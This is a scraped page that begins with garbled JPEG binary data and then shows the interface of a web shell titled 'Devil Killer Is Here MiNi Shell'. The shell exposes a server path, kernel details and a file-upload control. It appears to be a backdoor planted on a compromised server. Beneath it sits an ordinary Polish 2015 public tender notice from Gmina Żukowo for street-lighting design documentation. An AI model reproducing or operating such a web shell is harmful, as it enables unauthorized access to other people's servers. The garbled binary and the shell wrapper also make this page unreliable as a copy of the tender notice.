JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150720/182974-N-2015.html

<p class="kh_header"><b>Żukowo: Opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego dla budowy oświetlenia drogowego na terenie miejscowości Chwaszczyno, Rębiechowo, Żukowo</b><br>
<b>Numer ogłoszenia: 182974 - 2015; data zamieszczenia: 20.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żukowo , ul. Gdańska 52, 83-330 Żukowo, woj. pomorskie, tel. +48 58 6858300, faks +48 58 6858300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego dla budowy oświetlenia drogowego na terenie miejscowości Chwaszczyno, Rębiechowo, Żukowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego dla budowy oświetlenia drogowego na terenie miejscowości Chwaszczyno, Rębiechowo, Żukowo.
Dokumentacje projektowo - kosztorysowe należy opracować z podziałem na zadania obejmujące obszar miejscowości:
Zadanie 1 - Chwaszczyno ul. Tuchomska
Zadanie 2 - Rębiechowo ul. Tęczowa
Zadanie 3 - Żukowo ul. Kościerska 

1. 	Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowych wraz z przygotowaniem dokumentów i wniosków w celu uzyskania decyzji pozwolenia na budowę oraz pełnienie nadzoru autorskiego (prawo opcji) dla budowy oświetlenia drogowego w miejscowościach  Chwaszczyno, Rębiechowo, Żukowo. 
2. 	Dokumentacje projektowo - kosztorysowe należy opracować oddzielnie dla poszczególnych zadań:
Zadanie 1 - Chwaszczyno ul. Tuchomska: 
a)	długość ok. 745 m,
b)	lokalizacja - wg załącznika graficznego nr 1,
c)	obszar objęty miejscowym planem zagospodarowania przestrzennego; 
Zadanie 2 - Rębiechowo ul. Tęczowa:
a)	długość ok. 830 m,
b)	lokalizacja - wg załącznika graficznego nr 2,
c)	obszar objęty częściowo miejscowym planem zagospodarowania przestrzennego;  
Zadanie 3 - Żukowo ul. Kościerska: 
a)	długość ok. 650 m,
b)	lokalizacja - wg załącznika graficznego nr 3,
c)	brak miejscowego planu zagospodarowania przestrzennego.  
3.  Zamówienie dla każdego zadania obejmuje: 
1) opracowanie  dokumentacji projektowo - kosztorysowej w zakresie:
b) 	projekty budowlane,
c) 	projekty wykonawcze, 
d) 	kosztorysy inwestorskie wraz z przedmiarami robót, zbiorcze zestawienie kosztów dla budowy (ZZK), 
e) 	przedmiary robót,  
f) 	specyfikacje techniczne wykonania i odbioru robót budowlanych;
2) uzyskanie wszystkich wymaganych prawem decyzji, pozwoleń, opinii i odstępstw w rozumieniu ustawy prawo budowlane niezbędnych do uzyskania decyzji pozwolenia na budowę, 
3)	przygotowaniem dokumentów i wniosku w celu uzyskania decyzji pozwolenia  na budowę,
4) aktualizację kosztorysu inwestorskiego (dwukrotną),
5) pełnienie nadzoru autorskiego podczas  realizacji  robót budowlanych (prawo opcji).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>1.	Zamawiający może udzielić wykonawcy w okresie 3 lat od udzielenia zamówienia  podstawowego   zamówień uzupełniających, polegających na powtórzeniu tego samego rodzaju zamówienia, czyli opracowaniu dokumentacji projektowej, kosztorysów, przedmiarów, specyfikacji technicznych wykonania i odbioru robót budowlanych  w zakresie wszystkich branż objętych niniejszym zamówieniem, świadczenie usług nadzoru autorskiego. 
2.	Łączna wartość zamówień uzupełniających nie może być wyższa niż 50% wartości zamówienia   podstawowego.
3. Wynagrodzenie za usługi objęte zamówieniami uzupełniającymi będzie ustalane  w trakcie negocjacji z wykonawcą z uwzględnieniem składników cenotwórczych zaoferowanych w przetargu, a w przypadku ich braku o Środowiskowe Zasady Wyceny Prac Projektowych, wytyczne Okręgowej Izby Architektów i Inżynierów Budownictwa właściwej dla siedziby zamawiającego, kalkulację własną wykonawcy. Zamawiający dopuszcza stosowanie upustów do wyliczonych cen. 
4. 	Podstawą do realizacji zamówienia uzupełniającego będzie odrębna umowa, która będzie  określała m.in. zakres zamówienia, termin realizacji, wysokość wynagrodzenia wykonawcy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2, 71.24.50.00-7, 71.24.60.00-4, 71.32.00.00-7, 71.35.40.00-4, 45.11.12.50-5, 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże posiadanie wiedzy                   i doświadczenia, rozumianej jako zasób umiejętności, praktykę i wprawę, wyrażające się                   w wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch zamówień polegających na opracowaniu dokumentacji projektowej budowy/rozbudowy/przebudowy oświetlenia drogowego, w tym co najmniej jednego zamówienia o wartości nie mniejszej 20.000,00 PLN netto.
Za zamówienia wykonane zostaną uznane usługi zakończone i odebrane przez zamawiającego przed upływem terminu składania ofert. 
W przypadku wykonawców wspólnie ubiegających się o zamówienie nie wymaga się aby każdy z wykonawców wykazał spełnienie w/w warunku oddzielnie (wystarczające będzie jak tylko jeden wykonawca wykaże się wymaganą wiedzą i doświadczeniem albo wykonawcy wspólnie wykażą spełnienie warunku w zakresie wiedzy i doświadczenia.

Pod pojęciem >dokumentacja projektowa< należy rozumieć co najmniej projekt budowlany i projekt wykonawczy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli wykonawca wskazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy prawo zamówień
publicznych, będzie polegał na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b cyt.
ustawy, podmiot ten musi uczestniczyć w realizacji zamówienia w takim zakresie zamówienia, dla której
wykonawca polega na jego zasobach. Nie można przekazać, ani zobowiązać się do udzielenia doświadczenia bez
osobistego udziału udzielającego tych zasobów w realizacji zamówienia. Wykonawca zobowiązany jest do
wykazania tych podmiotów (nazwy i adresy) jako podwykonawców na formularzu OFERTA. 2. Jeżeli wykonawca
wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów
to składa w formie pisemnej zobowiązanie innego podmiotu, które w sposób jednoznaczny i niebudzący
wątpliwości określi: 1) kto jest podmiotem przyjmującym zasoby, 2) nazwę, dane adresowe innego podmiotu, 3)
zakres zobowiązania innego podmiotu (jakie zasoby udostępnia), 4) przedmiot zobowiązania (czego dokładnie
zobowiązanie dotyczy), 5) w jaki sposób zobowiązanie będzie realizowane: w jaki sposób konkretne zasoby będą
udostępnione i wykorzystywane przez wykonawcę przy wykonywaniu zamówienia, w jakim okresie czasu itp., 6)
charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem. Zamawiający musi znać treść łączącego
inny podmiot i wykonawcę stosunku zobowiązaniowego, wynikających z niego praw i obowiązków, aby móc

dokonać analizy i oceny rzeczywistego i realnego udostępnienia oraz korzystania z zasobów podczas realizacji
zamówienia. Podmiot udostępniający zasoby składa wraz z zobowiązaniem oświadczenie, iż odpowiada solidarnie
z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia deklarowanych zasobów podczas
realizacji zamówienia. W celu wykazania przez wykonawcę dysponowania zasobami innego podmiotu wykonawca
może przedstawić jedną z umów nazwanych, regulowanych postanowieniami Kodeksu Cywilnego jak i
oświadczenia woli innego podmiotu. Jeżeli przedmiotem udostępnienia będą wiedza i doświadczenie to
zobowiązanie powinno wprost wskazywać na jednoczesne uczestnictwo udostępniającego w realizacji zamówienia
i określeniu charakteru tego uczestnictwa. Zobowiązanie musi być podpisane przez osoby upoważnione do
składania oświadczeń woli w imieniu innego podmiotu (podpisy czytelne, a w przypadku kiedy podpisy są
nieczytelne - opatrzone pieczątkami imiennymi). Do pisemnego zobowiązania należy dołączyć: 1) dokument, z
którego będzie wynikało, kto jest upoważniony do składania oświadczeń woli w imieniu innego podmiotu, a jeżeli
podmioty te będą uczestniczyły w realizacji w realizacji zamówienia (podwykonawstwo): 1) oświadczenie o braku
podstaw do wykluczenia w okolicznościach, o których mowa w art. 24 ust. 1 ustawy prawo zamówień publicznych
(OŚWIADCZENIE NR 3); 2) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania
braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy
przed upływem terminu składania ofert. Wszystkie zobowiązania należy składać w oryginale. Dokumenty innych
podmiotów podpisują osoby upoważnione do reprezentowania tych podmiotów. 3. Jeżeli w kraju, w którym
wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje
się je oświadczeniem, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożonym przed
notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub
gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub
miejsce zamieszkania. Oświadczenie powinno być wystawione nie wcześniej niż 6 miesięcy przed upływem
terminu składania ofert. Powyższe ma zastosowanie odpowiednio do innych podmiotów. 4. W przypadku
wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego: 1) oferta powinna zawierać
pełnomocnictwo ustanawiające pełnomocnika (lidera) do reprezentowania wykonawców w postępowaniu o
udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
publicznego, pełnomocnictwo należy złożyć w formie oryginału lub kopii poświadczonej przez notariusza, 2) każdy
z wykonawców zobowiązany jest do dostarczenia dokumentów potwierdzających, że nie podlega wykluczeniu z
postępowania na podstawie art. 24 ust. 1 ustawy - prawo zamówień publicznych, 3) każdy z wykonawców składa
INFORMACJĘ NR 1 w zakresie przynależności do grupy kapitałowej lub braku przynależności do grupy
kapitałowej. 5. Jeżeli oferta wykonawców tworzących konsorcjum i ubiegających się wspólnie o udzielenie
zamówienia zostanie wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia
publicznego, umowy regulującej współpracę tych wykonawców. 6. Jeżeli inaczej uregulowano zasady współpracy i
reprezentacji przedsiębiorców w spółce cywilnej, do oferty należy dołączyć pełnomocnictwo ustanawiające
pełnomocnika (lidera) do reprezentowania przedsiębiorców w postępowaniu o udzielenie zamówienia publicznego
albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli oferta spółki
cywilnej zostanie wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego

umowy spółki cywilnej. 7. Upoważnienie do podpisania oferty (pełnomocnictwo) winno być dołączone do oferty, o
ile nie wynika to z innych dokumentów załączonych do oferty. Pełnomocnictwo w swojej treści winno jednoznacznie
wskazywać uprawnienie do podpisania oferty. Pełnomocnictwo należy przedłożyć w formie oryginału lub kopii
poświadczonej przez notariusza. 8. OŚWIADCZENIE NR 1, INFORMACJĘ NR 1 należy złożyć w formie oryginału
lub kopii poświadczonej przez notariusza. 9. Wszystkie oświadczenia oraz inne załączniki do oferty winny być
również podpisane przez upoważnionego przedstawiciela / przedstawicieli wykonawcy. Wszystkie dokumenty (z
zastrzeżeniem punktu 7 i punktu 8) muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za
zgodność z oryginałem przez osobę / osoby upoważnione do reprezentowania wykonawcy - na każdej zapisanej
stronie poświadczonego dokumentu. Oświadczenia oraz załączniki dotyczące podmiotów udostępniających zasoby
podpisują odpowiednio osoby uprawnione do występowania w obrocie prawnym w imieniu tych podmiotów. 10. W
przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, kopie dokumentów dotyczących
danego wykonawcy są poświadczane za zgodność z oryginałem przez tego wykonawcę lub pełnomocnika.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres rękojmi - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie. 
2. 	Niedopuszczalne są zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, z wyjątkiem zmian o których mowa w ust. 3.
3.  Zmiany w umowie mogą dotyczyć:
1) terminu wykonania zamówienia,
2) wysokości wynagrodzenia wykonawcy,
3) udziału osób - projektantów.
4.  Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
1) 	przerwy w realizacji zamówienia na skutek działań podmiotów trzecich, np. przedłużanie terminów wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, badań, ekspertyz, uzgodnień z przyczyn niezawinionych przez Wykonawcę,
2)	przedłużanie terminów uzgadniania dokumentacji projektowej przez organy administracji lub inne podmioty,
3) 	utrudnianie przez właścicieli nieruchomości dostępu do nieruchomości, 
4)	konieczności wykonania prac dodatkowych, które będą niezbędne dla  prawidłowej realizacji przedmiotu zamówienia, a których nie można było przewidzieć na etapie składania oferty,
5) 	rezygnacji z realizacji części zamówienia,
6) 	czasowego wstrzymania prac przez Zamawiającego,
7)	wprowadzenia zmian do dokumentacji projektowej w postaci prac dodatkowych, równoważnych, ale nie wykraczających poza zakres przedmiotu zamówienia na uzasadniony wniosek Wykonawcy, Zamawiającego i w sytuacji konieczności zwiększenia usprawnienia procesu projektowania, usunięcia wad ukrytych dokumentacji projektowej, uzyskania lepszego efektu użytkowego przedmiotu zamówienia.
5. 	Zmiana wysokości wynagrodzenia Wykonawcy może nastąpić w przypadku:
 	1) 	odstąpienia (rezygnacji) od części zamówienia,
2) wprowadzenia zmian do dokumentacji projektowej w postaci prac dodatkowych, równoważnych, ale nie wykraczających poza zakres przedmiotu zamówienia na uzasadniony wniosek Wykonawcy, Zamawiającego i w sytuacji konieczności zwiększenia usprawnienia procesu projektowania, uzyskania lepszego efektu użytkowego przedmiotu zamówienia,
     3) 	ustawowej zmiany stawki podatku VAT. 
6. 	Zmiana osób - projektantów może nastąpić w przypadku:
 	1)  zdarzeń losowych niezależnych od Wykonawcy,
	2)  utraty uprawnień przez wskazane przez Wykonawcę osoby,
	3)  wykreślenia osób z  listy członków branżowej izby samorządu zawodowego.
7.	W przypadku zmiany osób Wykonawca winien przedstawić Zamawiającemu nowe osoby o niegorszych kwalifikacjach i uprawnieniach w stosunku do osób, które zostały wskazane w ofercie Wykonawcy i spełniających wymagania opisane w specyfikacji istotnych warunków zamówienia.
8. 	Poza przypadkami określonymi w poprzedzających paragrafach umowy i ust. 3, zmiany umowy mogą wystąpić w następujących przypadkach:
1) 	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy,
2) 	powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w niniejszej umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie niniejszej umowy w celu jednoznacznej interpretacji zapisów przez strony umowy,
3) 	wystąpią przyczyny niezależne od stron umowy, które będą skutkowały koniecznością zastosowania innych rozwiązań, gdy zastosowanie rozwiązań przewidzianych w specyfikacji istotnych warunków zamówienia                    groziłoby niewykonaniem  lub wadliwym wykonaniem przedmiotu zamówienia,
4) wystąpią środki ochrony prawnej w postępowaniu o zamówienie publiczne uniemożliwiające wykonanie zamówienia w terminie wskazanym w postępowaniu.  
9. 	Warunki dokonywania zmian:
1)  inicjowanie zmian na pisemny wniosek Wykonawcy lub Zamawiającego,
2)	uzasadnienie konieczności i wpływu zmian na realizację zamówienia,
3)  w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany.
10.Zmiany zapisów umowy, które nie odnoszą się do treści oferty nie wymagają pisemnego aneksu pod rygorem nieważności. Za zmiany takie uważa się np.:
1)   zmianę koordynatora za strony zamawiającego,
2)   zmianę koordynatora ze strony wykonawcy,
1)	zmianę rachunku bankowego, 
2)	zmiany adresowe.
11.Strony zobowiązane są do powiadomienia na piśmie o zmianach o których mowa w  ust. 10 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
